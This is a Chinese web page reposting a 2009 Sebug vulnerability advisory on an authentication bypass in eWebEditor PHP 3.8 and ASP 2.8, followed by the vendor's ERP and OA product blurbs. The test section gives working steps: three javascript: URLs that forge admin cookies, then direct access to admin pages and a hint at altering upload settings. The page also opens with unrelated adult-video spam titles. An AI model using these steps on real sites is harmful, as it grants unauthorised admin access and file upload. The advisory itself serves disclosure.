国产九九免费视频,亚洲精品tv久久久久久久久,91精品国产色综合久久不卡蜜

欧美成人精品手机在线观看_69视频国产_动漫精品第一页_日韩中文字幕网 - 日本欧美一区二区

ewebeditor php&asp版本后臺(tái)跳過(guò)認(rèn)證漏洞-適用于asp2.8 PHP3.8

當(dāng)前位置：點(diǎn)晴教程→知識(shí)管理交流 →『技術(shù)文檔交流』

admin

2010年8月13日 10:20 本文熱度 5197

SSV ID:19010

SEBUG-Appdir:eWebEditor

發(fā)布時(shí)間:2009-12-12

影響版本:

php v3.8

asp v2.8

漏洞描述:

eWebEditor是一個(gè)所見(jiàn)即所得的在線編輯器。顧名思義，就是能在網(wǎng)絡(luò)上使用所見(jiàn)即所得的編輯方式進(jìn)行編輯圖文并茂的文章、新聞、討論貼、通告、記事等多種文字處理應(yīng)用。

../ewebeditor/admin/config.php文件

用戶(hù)認(rèn)證方式存在嚴(yán)重的安全漏洞，可以直接跳過(guò)認(rèn)證獲取到管理員權(quán)限。

<*參考

http://hi.baidu.com/smc2816/blog/item/b1dc4f54485116ceb645ae27.html

測(cè)試方法:

[www.sebug.net]
本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!

首先當(dāng)然要找到登陸后臺(tái),默認(rèn)是../eWebEditor/admin/login.php,進(jìn)入后臺(tái)后隨便輸入一個(gè)用戶(hù)和密碼,當(dāng)然會(huì)提示出錯(cuò)了.

這時(shí)候你清空瀏覽器的url,然后輸入 

javascript:alert(document.cookie="adminuser="+escape("admin")); 

javascript:alert(document.cookie="adminpass="+escape("admin")); 

javascript:alert(document.cookie="admindj="+escape("1"));

后三次回車(chē),清空瀏覽器的 url,大家注意了,這次輸入的url要注意,我們這次要輸入的文件都是在正常情況下經(jīng)過(guò)驗(yàn)證才能瀏覽的文件如../ewebeditor/admin /default.php

哈哈,直接進(jìn)去了,利用和asp一樣,新增樣式修改上傳,就ok了

SEBUG安全建議:

暫無(wú)

請(qǐng)參考官方補(bǔ)丁

// sebug.net [2010-01-27]

該文章在 2010/8/13 10:20:56 編輯過(guò)

關(guān)鍵字查詢(xún)

相關(guān)文章

正在查詢(xún)...

點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專(zhuān)業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國(guó)內(nèi)大量中小企業(yè)的青睞。

點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車(chē)隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理，結(jié)合碼頭的業(yè)務(wù)特點(diǎn)，圍繞調(diào)度、堆場(chǎng)作業(yè)而開(kāi)發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體，是物流碼頭及其他港口類(lèi)企業(yè)的高效ERP管理信息系統(tǒng)。

點(diǎn)晴WMS倉(cāng)儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷(xiāo)售管理,采購(gòu)管理,倉(cāng)儲(chǔ)管理,倉(cāng)庫(kù)管理,保質(zhì)期管理,貨位管理,庫(kù)位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。

點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi)，不限功能、不限時(shí)間、不限用戶(hù)的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。